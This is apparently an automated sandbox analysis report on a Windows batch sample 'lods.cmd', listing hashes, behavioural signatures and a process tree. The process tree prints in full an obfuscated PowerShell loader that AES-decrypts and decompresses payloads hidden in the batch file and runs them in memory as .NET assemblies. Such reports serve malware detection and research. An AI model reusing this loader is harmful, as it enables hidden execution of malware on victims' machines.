Resubmissions
15-02-2024 02:04
240215-chmlpaeg88 10Analysis
-
max time kernel
358s -
max time network
359s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
15-02-2024 02:04
Static task
static1
Behavioral task
behavioral1
Sample
lods.cmd
Resource
win7-20231129-en
windows7-x64
4 signatures
600 seconds
Behavioral task
behavioral2
Sample
lods.cmd
Resource
win10v2004-20231222-en
windows10-2004-x64
13 signatures
600 seconds
General
-
Target
lods.cmd
-
Size
264KB
-
MD5
194118c43c65faad06bf5ff6cd9b52a2
-
SHA1
7bdf85b3968747acf21d37df5e56d54f8a0c7e62
-
SHA256
1a5ad9ae7b0dcdc2edb7e93556f2c59c84f113879df380d95835fb8ea3914ed8
-
SHA512
42a7d57520d68acfc79972e387cf6a9ca45b1159ee14ba1d6b4bc801d90d38e7eeb6dfd6aa3c039773cceb6d3a9223cc8459abd7661ae162b89644b6db8996b2
-
SSDEEP
6144:0ChPgq+rL7AAZG5R0Oscn3X/QOT31RvQ/3R:0uY105CO+aUR
Score
1/10
Malware Config
Signatures
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 3040 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3040 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3040 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 2872 wrote to memory of 2964 2872 cmd.exe 29 PID 2872 wrote to memory of 2964 2872 cmd.exe 29 PID 2872 wrote to memory of 2964 2872 cmd.exe 29 PID 2964 wrote to memory of 3020 2964 cmd.exe 31 PID 2964 wrote to memory of 3020 2964 cmd.exe 31 PID 2964 wrote to memory of 3020 2964 cmd.exe 31 PID 2964 wrote to memory of 3040 2964 cmd.exe 32 PID 2964 wrote to memory of 3040 2964 cmd.exe 32 PID 2964 wrote to memory of 3040 2964 cmd.exe 32 PID 2964 wrote to memory of 3040 2964 cmd.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\lods.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:2872 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\lods.cmd2⤵
- Suspicious use of WriteProcessMemory
PID:2964 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\lods.cmd';$yDpz='IKCWFnKCWFvoKCWFkeKCWF'.Replace('KCWF', ''),'RXWQleXWQladLXWQlineXWQlsXWQl'.Replace('XWQl', ''),'GeXvGNtXvGNCXvGNurrXvGNenXvGNtPXvGNrXvGNocXvGNesXvGNsXvGN'.Replace('XvGN', ''),'FrxAMfomBxAMfasxAMfe64xAMfStxAMfrxAMfinxAMfgxAMf'.Replace('xAMf', ''),'CrXNBTeaXNBTtXNBTeDXNBTecXNBTrypXNBTtXNBTorXNBT'.Replace('XNBT', ''),'CeDSsheDSsaneDSsgeDSseEeDSsxteDSseeDSsneDSssieDSsoneDSs'.Replace('eDSs', ''),'EnNMJVtNMJVryPNMJVoinNMJVtNMJV'.Replace('NMJV', ''),'DAdhwecAdhwompAdhwrAdhweAdhwssAdhw'.Replace('Adhw', ''),'SpWkTWlWkTWitWkTW'.Replace('WkTW', ''),'MCgUGaCgUGinCgUGMCgUGodCgUGuCgUGleCgUG'.Replace('CgUG', ''),'LoauLqjduLqj'.Replace('uLqj', ''),'TrZUBEanZUBEsfZUBEoZUBErmZUBEFZUBEinZUBEalZUBEBZUBEloZUBEckZUBE'.Replace('ZUBE', ''),'CopFJKYyFJKYToFJKY'.Replace('FJKY', ''),'ElLTAIeLTAImeLTAInLTAItAtLTAI'.Replace('LTAI', '');powershell -w hidden;function jErZG($xSDUT){$cRyDq=[System.Security.Cryptography.Aes]::Create();$cRyDq.Mode=[System.Security.Cryptography.CipherMode]::CBC;$cRyDq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$cRyDq.Key=[System.Convert]::($yDpz[3])('nlftMe/+KZS0ywJx8vu78pDIl8AaOzKgZtZxqMq9lB8=');$cRyDq.IV=[System.Convert]::($yDpz[3])('qNVO13iwamE1laUPiVA0ow==');$ofBHL=$cRyDq.($yDpz[4])();$mDAXw=$ofBHL.($yDpz[11])($xSDUT,0,$xSDUT.Length);$ofBHL.Dispose();$cRyDq.Dispose();$mDAXw;}function agayp($xSDUT){$jmbnu=New-Object System.IO.MemoryStream(,$xSDUT);$wFcba=New-Object System.IO.MemoryStream;$adSek=New-Object System.IO.Compression.GZipStream($jmbnu,[IO.Compression.CompressionMode]::($yDpz[7]));$adSek.($yDpz[12])($wFcba);$adSek.Dispose();$jmbnu.Dispose();$wFcba.Dispose();$wFcba.ToArray();}$oFNMD=[System.IO.File]::($yDpz[1])([Console]::Title);$JFMmz=agayp (jErZG ([Convert]::($yDpz[3])([System.Linq.Enumerable]::($yDpz[13])($oFNMD, 5).Substring(2))));$CdrWA=agayp (jErZG ([Convert]::($yDpz[3])([System.Linq.Enumerable]::($yDpz[13])($oFNMD, 6).Substring(2))));[System.Reflection.Assembly]::($yDpz[10])([byte[]]$CdrWA).($yDpz[6]).($yDpz[0])($null,$null);[System.Reflection.Assembly]::($yDpz[10])([byte[]]$JFMmz).($yDpz[6]).($yDpz[0])($null,$null); "3⤵PID:3020
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3040
-
-